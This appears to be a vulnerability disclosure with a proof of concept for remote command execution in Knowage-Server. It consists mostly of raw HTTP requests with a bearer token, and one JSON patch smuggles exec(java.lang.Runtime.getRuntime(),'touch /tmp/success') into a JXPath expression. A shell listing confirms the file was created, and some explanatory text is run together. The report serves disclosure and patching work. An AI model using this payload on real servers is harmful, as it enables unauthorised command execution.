To reproduce this vulnerability, you can follow the step below:
GET /knowagemeta/restful-services/1.0/pages/edit?datasourceId=1&user_id=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYml1c2VyIiwiZXhwIjoxNzIwMjMzNDU1fQ.sZbeMeTssxvJi2U1vT3cULPmaFZZkCAW_Hy2ut-v_fU&bmId=1&bmName=poc HTTP/1.1
Host: localhost:18080
Access-Control-Allow-Origin: *
Accept: application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Kn-Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYml1c2VyIiwiZXhwIjoxNzIwMjMzNDU1fQ.sZbeMeTssxvJi2U1vT3cULPmaFZZkCAW_Hy2ut-v_fU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36:18080/knowage-vue/business-model-catalogue/1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: __test=1; kn.lang=en-US
Connection: close
HTTP/1.1 200
X-Kn-Correlation-Id: dca905e8-63fb-4522-8794-cf040c4fe014
Set-Cookie: JSESSIONID=C2476263BFE1D0FB06BD8558B092FC71;
POST /knowagemeta/restful-services/1.0/metaWeb/create HTTP/1.1
Host: localhost:18080
Content-Length: 80
X-Kn-Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYml1c2VyIiwiZXhwIjoxNzIwMjMzNDU1fQ.sZbeMeTssxvJi2U1vT3cULPmaFZZkCAW_Hy2ut-v_fU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Type: application/json
Access-Control-Allow-Origin: *
Accept: application/json; charset=utf-8
Origin: [http://localhost:18080](https://urldefense.com/v3/__http://localhost:18080__;!!LQkDIss!XlyBxKS-EDwtgBW_f9WXZHYxl8-IM9taFUU0X-tQSXe_vqsc8w2sPgjFMnet0_en_f64XT-Jzp11-J4yVCDQMQA$)
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=C2476263BFE1D0FB06BD8558B092FC71; __test=1; kn.lang=en-US
Connection: close
{"datasourceId":"1","physicalModels":[""],"businessModels":[],"modelName":"xxx"}POST /knowagemeta/restful-services/1.0/metaWeb/checkRelationships HTTP/1.1
Host: localhost:18080
Content-Length: 127
X-Kn-Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYml1c2VyIiwiZXhwIjoxNzIwMjMzNDU1fQ.sZbeMeTssxvJi2U1vT3cULPmaFZZkCAW_Hy2ut-v_fU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Type: application/json
Access-Control-Allow-Origin: *
Accept: application/json; charset=utf-8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=C2476263BFE1D0FB06BD8558B092FC71; __test=1; kn.lang=en-US
Connection: close
{"diff":[
{
"op": "move",
"path":"",
"value":"",
"from":"exec(java.lang.Runtime.getRuntime(),'touch /tmp/success')"
}
]}docker exec -it knowage-server-docker-knowage-1 /bin/bash
root@knowage:/home/knowage# ls /tmp
hsperfdata_root success
trganda Reporter
This vulnerability was caused by using unsafe
org.apache.commons.jxpath.JXPathContextin MetaService.java, refer https://github.com/KnowageLabs/Knowage-Server/blob/master/knowagemeta/src/main/java/it/eng/knowage/meta/service/MetaService.java#L229. A normal user can use this function to execute command on target server.biuser/biuserand send the request below to get the authorizated session idThe response will like below
/tmp/successwas successed craeted in container knowage